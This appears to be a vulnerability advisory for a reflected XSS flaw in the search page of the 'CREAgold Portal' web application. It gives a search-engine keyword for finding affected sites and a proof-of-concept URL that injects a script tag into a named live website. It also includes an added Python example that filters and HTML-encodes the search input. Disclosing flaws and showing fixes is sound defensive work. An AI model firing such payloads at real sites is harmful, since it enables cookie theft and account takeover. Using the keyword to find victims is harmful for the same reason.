< ------------------- header data start ------------------- >

#############################################################

# Application Name : CREAgold Portal

# Vulnerable Type : XSS

# Google Keyword : CREAgold

# Infection : XSS can be used to gain access to the admin's cookies.

# Bug Fix Advice : So that queries made on the search page cannot go beyond a defined set of characters, characters such as ', +, % must be disallowed in the script, and HTML code must also be blocked in the script.

# author : Bug Researchers

#############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

Url/Directory http://www.biztrabzonluyuz.com/default.asp?sayfa=arama1&aranan=><script>alert(1)</script>%20&tur1=&pn=

< -- bug code end of -- >
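
The fix advice above, sketched as an added example (not code from the advisory or from CREAgold): the `aranan` search value is checked against an allow-list and HTML-encoded before it is written back into the page. The permitted character set, the length limit, the `<input>` markup and the `example.test` host are assumptions; only the query string of the first sample comes from the advisory.

```python
import html
import re
from urllib.parse import urlsplit, parse_qs

# Allow-list for search terms: letters (Turkish included), digits, underscore,
# space and hyphen. Character set and 64-char limit are assumptions.
ALLOWED = re.compile(r"[\w \-]{1,64}")


def get_search_term(url):
    """Return the URL-decoded 'aranan' value, or '' when it is absent."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return query.get("aranan", [""])[0]


def is_valid_term(term):
    """True only if the whole trimmed term consists of allow-listed characters."""
    return ALLOWED.fullmatch(term.strip()) is not None


def render_search_box(term):
    """Write the term into an attribute; quote=True also encodes " and '."""
    return '<input name="aranan" value="%s">' % html.escape(term, quote=True)


def handle_search(url):
    """Reject terms outside the allow-list; always encode what is echoed back."""
    term = get_search_term(url)
    if not is_valid_term(term):
        return 400, render_search_box("")
    return 200, render_search_box(term.strip())


# Constructed sample requests. REPORTED reuses the advisory's query string on a
# placeholder host; BENIGN is an ordinary two-word search.
REPORTED = ("http://example.test/default.asp?sayfa=arama1"
            "&aranan=><script>alert(1)</script>%20&tur1=&pn=")
BENIGN = "http://example.test/default.asp?sayfa=arama1&aranan=trabzon+hurma&tur1=&pn="

if __name__ == "__main__":
    for sample in (REPORTED, BENIGN):
        print(handle_search(sample))
    # Encoding alone already renders the reported value inert:
    print(render_search_box(get_search_term(REPORTED)))
```

The allow-list rejects the reported value outright, and the encoding step keeps the output inert even if a character is later added to the permitted set.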